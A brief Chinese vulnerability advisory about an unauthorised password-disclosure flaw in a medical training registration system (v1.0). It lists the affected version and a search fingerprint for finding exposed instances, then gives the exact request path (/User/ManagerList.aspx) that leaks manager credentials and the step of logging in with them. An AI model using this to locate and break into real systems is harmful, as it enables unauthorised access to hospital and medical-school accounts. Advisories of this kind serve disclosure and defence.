远秋医学培训报名系统v1.0 ManagerList存在未授权账号密码泄露漏洞
一、漏洞简介
远秋医学在线考试系统采用通用的试题库管理软件,适用于各级各类医学院校和医院。远秋医学在线考试系统某接口存在未授权信息泄露漏洞,攻击者可利用该漏洞获取数据库敏感信息。远秋医学培训报名系统v1.0存在未授权访问漏洞,攻击者可通过漏洞获取登录密码。
二、影响版本
- 远秋医学培训报名系统v1.0
三、资产测绘
title="远秋医学培训报名系统v1.0"
四、漏洞复现
/User/ManagerList.aspx?ty=1&ty=1
使用获取密码登录系统
